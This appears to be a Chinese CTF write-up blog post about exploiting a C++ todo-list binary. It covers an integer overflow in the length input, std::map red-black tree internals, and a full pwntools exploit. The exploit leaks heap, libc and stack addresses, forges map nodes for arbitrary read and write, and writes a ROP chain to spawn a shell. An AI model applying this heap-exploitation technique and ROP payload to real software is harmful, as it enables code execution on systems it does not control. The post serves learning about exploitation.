  751.     v3 = (int *)std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::_M_emplace_hint_unique<std::piecewise_construct_t const&amp;,std::tuple<std::string const&amp;>,std::tuple<>>(
  752.                   &amp;map_stuct,
  753.                   v3,
  754.                   &amp;p_s2);
  755.   }
  756.   v10 = (void *)*((_QWORD *)v3 + 8);
  757.   if ( v10 )
  758.     operator delete(v10, 1uLL);
  759.   v11 = std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::equal_range(
  760.           &amp;map_stuct,
  761.           &amp;titile);
  762.   v13 = v12;
  763.   v14 = v11;
  764.   if ( MEMORY[0x72D8] == v11 &amp;&amp; &amp;MEMORY[0x72C8] == v12 )
  765.   {
  766.     std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::_M_erase(MEMORY[0x72D0]);
  767.     MEMORY[0x72D8] = (__int64)&amp;MEMORY[0x72C8];
  768.     MEMORY[0x72D0] = 0LL;
  769.     MEMORY[0x72E0] = (__int64)&amp;MEMORY[0x72C8];
  770.     MEMORY[0x72E8] = 0LL;
  771.   }
  772.   else if ( v12 != (int *)v11 )
  773.   {
  774.     do
  775.     {
  776.       v15 = v14;
  777.       v14 = std::_Rb_tree_increment(v14);
  778.       v16 = std::_Rb_tree_rebalance_for_erase(v15, &amp;MEMORY[0x72C8]);
  779.       v17 = *(void **)(v16 + 32);
  780.       v18 = (void *)v16;
  781.       if ( v17 != (void *)(v16 + 48) )
  782.         operator delete(v17, *(_QWORD *)(v16 + 48) + 1LL);
  783.       operator delete(v18, 0x50uLL);
  784.       --MEMORY[0x72E8];
  785.     }
  786.     while ( v13 != (int *)v14 );
  787.   }
  788. LABEL_32:
  789.   if ( titile != v28 )
  790.     operator delete(titile, v28[0] + 1);
  791.   return v29 - __readfsqword(0x28u);
  792. }

这里存在整数溢出,输入-1,然后可以溢出0xffffffff,但size只有0x20

  1.  std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Length: ", 8LL);
  2.   std::istream::_M_extract<unsigned int>(std::cin, &amp;len);
  3.   len_more1 = (unsigned int)(len + 1);
  4.   todo_node_chunk = (void *)operator new[](len_more1);
  5.   if ( len_more1 )
  6.     memset(todo_node_chunk, 0, len_more1);

edit发现输入无限制?难道可以溢出?发现不行好像自动束缚了

  1. std::__istream_extract(std::cin, *((_QWORD *)addr_node + 8), 0x7FFFFFFFFFFFFFFFLL);

map

但难点是map的逆向

map的内存布局
std::map原理
C++(STL):31 —-关联式容器map源码剖析

map是C++ STL中的关联容器,存储的是键值对(key-value),可以通过key快速索引到value。map容器中的数据是自动排序的,其排序方式是严格的弱排序(stick weak ordering),即在判断Key1和Key2的大小时,使用“<”而不是“<=”。map 使用二叉搜索树实现,STL map的底层实现是红黑树。

map有几个值得注意的地方:map的赋值运算是深拷贝,即调用map_a = map_b后,map_a中的元素拥有独立的内存空间。map的[]运算比较有意思,当元素不存在的时候会插入新的元素;在map中查找key是否存在时可以用find或count方法,find查找成功返回的是迭代器,查找失败则返回mymap.end(),说明该key不存在;map中的key不允许重复,其count方法只能返回0或1。

map定义

map的所有元素都是pair,同时具备key和value,其中pair的第一个元素作为key,第二个元素作为value。map不允许相同key出现,并且所有pair根据key来自动排序,其中pair的定义在如下:

template <typename T1, typename T2>
struct pair {
typedef T1 first_type;
typedef T2 second_type;

  1. T1 first;
  2. T2 second;
  4. pair() : first(T1()), second(T2()) { }
  5. pair(const T1&amp; a, const T2&amp; b) : first(a), second(b) { }

};

从定义中看到pair使用模板化的struct来实现的,成员变量默认都是public类型。map的key不能被修改,但是value可以被修改,STL中的map是基于红黑树来实现的,因此可以认为map是基于红黑树封装了一层map的接口,底层的操作都是借助于RB-Tree的特性来实现的。

template <class Key, class T, class Compare = less, class Alloc = alloc>
class map {
public:
typedef Key key_type; //key类型
typedef T data_type; //value类型
typedef T mapped_type;
typedef pair<const Key, T> value_type; //元素类型, const要保证key不被修改
typedef Compare key_compare; //用于key比较的函数
private:
//内部采用RBTree作为底层容器
typedef rb_tree<key\_type, value\_type, identity, key\_compare, Alloc> rep_type;
rep_type t; //t为内部RBTree容器
public:
//iterator_traits相关
typedef typename rep_type::const_pointer pointer;
typedef typename rep_type::const_pointer const_pointer;
typedef typename rep_type::const_reference reference;
typedef typename rep_type::const_reference const_reference;
typedef typename rep_type::difference_type difference_type;

//迭代器相关
typedef typename rep_type::iterator iterator;
typedef typename rep_type::const_iterator const_iterator;
typedef typename rep_type::const_reverse_iterator reverse_iterator;
typedef typename rep_type::const_reverse_iterator const_reverse_iterator;
typedef typename rep_type::size_type size_type;

//迭代器函数
iterator begin() { return t.begin(); }
const_iterator begin() const { return t.begin(); }
iterator end() { return t.end(); }
const_iterator end() const { return t.end(); }
reverse_iterator rbegin() { return t.rbegin(); }
const_reverse_iterator rbegin() const { return t.rbegin(); }
reverse_iterator rend() { return t.rend(); }
const_reverse_iterator rend() const { return t.rend(); }

//容量函数
bool empty() const { return t.empty(); }
size_type size() const { return t.size(); }
size_type max_size() const { return t.max_size(); }

//key和value比较函数
key_compare key_comp() const { return t.key_comp(); }
value_compare value_comp() const { return value_compare(t.key_comp()); }

//运算符
T& operator[](const key_type& k)
{
return (*((insert(value_type(k, T()))).first)).second;
}
friend bool operator== __STL_NULL_TMPL_ARGS (const map&, const map&);
friend bool operator< __STL_NULL_TMPL_ARGS (const map&, const map&);
}

节点

Node 有 5 个成员,除了 left、right、data,还有 color 和 parent。

C++实现,位于bits/stl_tree.h
/**

  • Non-template code
    **/

enum rb_tree_color { kRed, kBlack };

struct rb_tree_node_base
{
rb_treecolor color;
rb_tree_nodebase\ parent;
rb_tree_nodebase* left;
rb_tree_nodebase* right*;
};

/**

  • template code
    **/

template
struct rb_tree_node : public rb_tree_node_base
{
Value valuefield;
};


-

Tree 有更多的成员,它包含一个完整的 rb_tree_node_base(color/parent/left/right),还有 node_count 和 key_compare 这两个额外的成员。

这里省略了一些默认模板参数,如 key_compare 和 allocator。
template<typename Key, typename Value> // key_compare and allocator
class rb_tree
{
public:
typedef std::less key_compare;
typedef rb_tree_iterator iterator;
protected:

struct rb_tree_impl // : public node_allocator
{
key_compare keycompare;
rb_tree_nodebase header;
size_t nodecount;
};
rb_treeimpl impl;
};

template<typename Key, typename T> // key_compare and allocator
class map
{
public:
typedef std::pair<const Key, T> value_type;
private:
typedef rb_tree<Key, value\_type> rep_type;
reptype tree;
};

迭代器

rb_tree 的 iterator 的数据结构很简单,只包含一个 rb_tree_node_base 指针,但是其++/—操作却不见得简单(具体实现函数不在头文件中,而在 libstdc++ 库文件中)。

// defined in library, not in header
rb_tree_node_base rb_tree_increment(rb_tree_node_base node);
// others: decrement, reblance, etc.

template
struct rb_tree_node : public rb_tree_node_base
{
Value valuefield;
};

template
struct rb_tree_iterator
{
Value& operator() const
{
return static_cast<rb_tree_node>(node_)->valuefield;
}

rb_treeiterator& operator++()
{
node = rb_treeincrement(node);
return *this;
}

rb_tree_nodebase\ node*;
};

再逆

交给AI逆了下
add大概逻辑如下

  1. #include <iostream>
  2. #include <string>
  3. #include <map>
  4. #include <new>
  5. #include <cstring>
  7. struct TodoNode {
  8.     char *content;
  9.     int length;
  10. };
  12. std::map<std::string, TodoNode> todo;
  14. unsigned __int64 __fastcall todo_add() {
  15.     unsigned __int64 start_time = __readfsqword(0x28u);
  16.     char title[256] = {0}; // 假设最大标题长度为256
  17.     unsigned int len = 0;
  18.     char *todo_node_chunk = nullptr;
  20.     // 读取标题
  21.     std::cout << "Title: ";
  22.     std::cin >> title;
  24.     // 检查标题是否已存在
  25.     auto it = todo.find(title);
  26.     if (it != todo.end()) {
  27.         std::cout << "Already exists" << std::endl;
  28.         return start_time - __readfsqword(0x28u);
  29.     }
  31.     // 读取长度
  32.     std::cout << "Length: ";
  33.     std::cin >> len;
  34.     unsigned int len_more1 = len + 1;
  36.     // 分配内存
  37.     todo_node_chunk = new char[len_more1];
  38.     if (len_more1) {
  39.         memset(todo_node_chunk, 0, len_more1);
  40.     }
  42.     // 插入红黑树
  43.     todo[title] = {todo_node_chunk, len};
  45.     // 处理异常
  46.     if (!todo[title].content) {
  47.         std::cout << "Out of memory" << std::endl;
  48.         delete[] title;
  49.         std::__throw_bad_alloc();
  50.     }
  52.     // 清理和返回
  53.     if (title != nullptr) {
  54.         delete[] title;
  55.     }
  57.     return start_time - __readfsqword(0x28u);
  58. }
  60. int main() {
  61.     todo_add();
  62.     return 0;
  63. }

刚开始add由于rootnode不存在,会去LABEL_34先初始化

先拿个实例编译下带符号表,然后再放IDA里看。大概弄出逻辑

  1. struct node
  2. {
  3.   _DWORD color;
  4.   _QWORD parents;
  5.   _QWORD left_son_node;
  6.   _QWORD right_son_node;
  7.   struct string title_str_obj;
  8.   struct pair todo_pair;
  9. };
  11. struct map
  12. {
  13.   _QWORD key_compare;
  14.   _QWORD color;
  15.   _QWORD parents;
  16.   _QWORD left;
  17.   _QWORD right;
  18.   _QWORD node_count;
  19. };
  21. struct pair
  22. {
  23.   _QWORD todo_ptr;
  24.   _QWORD todo_len;
  25. };
  27. struct string
  28. {
  29.   _QWORD ptr;
  30.   _QWORD size;
  31.   char str[16];
  32. };

一个todo_add就是增加一个节点

由于edit会结尾把换行符号改为零字节。不能溢出然后输出泄露

泄露后发现没有IO,std::cout不知道可不可行

但能控制node然后来任意地址读写,由于只有一开始的根节点的parent是指向map,其余的node里的parent都是指向堆地址。所以可以溢出来伪造覆盖。然后设置todo_ptr为environ,泄露栈。然后再通过edit改todo_ptr为栈,再写rop就行

或者UAF写fd也行

下次记得fuzz对size这方面也要随机些,感觉都束缚为正数了,所以没爆出来

exp

  1. from pwn import *
  2. import random
  3. context(os="linux",arch="amd64",log_level="debug")
  5. def randinit(n):
  6.     return random.randint(1, n)
  8. def new(title,length):
  9.     p.sendlineafter(b"> ",str(1))
  10.     p.sendlineafter(b"Title: ",title)
  11.     result=p.recvuntil(b"1. New todo",timeout=0.5)
  12.     if b"Already exists" in result:
  13.         return
  14.     p.sendline(length)
  15. def remove(title):
  16.     p.sendlineafter(b"> ",str(2))
  17.     p.sendlineafter(b"Title: ",title )
  19. def edit(title,content):
  20.     p.sendlineafter(b"> ",str(3))
  21.     p.sendlineafter(b"Title: ",title)
  22.     p.sendlineafter(b"TODO: ",content)
  24. def show(title):
  25.     p.sendlineafter(b"> ",str(4))
  26.     p.sendlineafter(b"Title: ",title)
  28. p=process("./chall")
  29. gdb.attach(p)
  30. pause()
  31. new(str(1),str(-1))
  32. remove(str(1))
  33. new(str(1),str(-1))
  34. show(str(1))  # leak heap
  35. p.recvuntil(b"TODO: ")
  36. heap=u64(p.recvuntil(b"\n",drop=True).ljust(8,b"\x00"))<<12
  37. print("heap leak "+hex(heap))
  39. new(str(2),str(-1))
  40. new(str(3),str(-1))
  41. new(str(4),str(-1))
  42. new(str(5),str(-1))
  43. new(str(6),str(-1))
  44. new(str(7),str(-1))
  45. new(str(8),str(-1))
  46. new(str(9),str(-1))
  47. new(str(10),str(-1))
  48. new(str(11),str(-1))
  49. payload=b"1"*0x10+b"\x00"*8+p64(0x461)
  51. edit(str(1),payload)
  52. remove(str(1))
  53. new(str(1),str(-1))
  54. show(str(2))   # leak libc
  55. p.recvuntil(b"TODO: ")
  56. libc=u64(p.recvuntil(b"\n",drop=True).ljust(8,b"\x00"))-0x203b20
  57. print("libc leak "+hex(libc))
  59. payload=b"1"*0x10+b"\x00"*8+p64(0x61)+p64(0)+p64(heap+0x750)+p64(0)+p64(0)+p64(heap+0x300)+p64(1)+p64(0x31)+p64(0) +p64(libc+0x20ad58)+p64(0x100)
  60. edit(str(1),payload)
  62. show(str(1))
  63. p.recvuntil(b"TODO: ")
  64. stack=u64(p.recvuntil(b"\n",drop=True).ljust(8,b"\x00"))
  65. print("stack leak "+hex(stack))
  67. payload=b"1"*0x10+b"\x00"*8+p64(0x61)+p64(0)+p64(heap+0x450)+p64(heap+0x750)+p64(heap+0x3d0)+p64(heap+0x380)+p64(1)+p64(0x32)+p64(0) +p64(stack-0x148)+p64(0x100)
  68. edit(str(2),payload)
  70. pause()
  71. bin_sh=libc+0x1cb42f
  72. sys=libc+0x58740
  73. ret=libc+0x000000000002882f
  74. pop_rdi=libc+0x000000000010f75b
  75. rop=p64(0)+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(sys)
  77. edit(str(2),rop)
  79. p.interactive()
  81. # pause()
  83. # index=0
  84. # file=open('fuzz.txt', 'w') 
  85. # p=process("./chall")
  86. # gdb.attach(p)
  87. # # pause()
  88. # for i in range(0x1000):
  89. #     match randinit(2):
  90. #         case 1:
  91. #             length=randinit(0x1000)
  92. #             title=str(index)
  93. #             new(title,str(length))
  94. #             file.write("insert size"+str(1)+"\n")
  95. #             file.flush()
  96. #         case 2:
  97. #             index=randinit(0x100)
  98. #             remove(str(index))
  99. #             file.write("remove title "+str(index)+"\n")
  100. #             file.flush()
  101. #         case 3:
  102. #             len=random.randint(0x1000, 0x1100)
  103. #             payload=len*b"a"
  104. #             edit(payload)
  105. #             file.write("edit \n")
  106. #             file.flush()
  • 发表于 2024-10-09 09:00:00
  • 阅读 ( 2128 )
  • 分类:其他

0 条评论

麦当当
麦当当

4 篇文章

麦当当

如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!

站长统计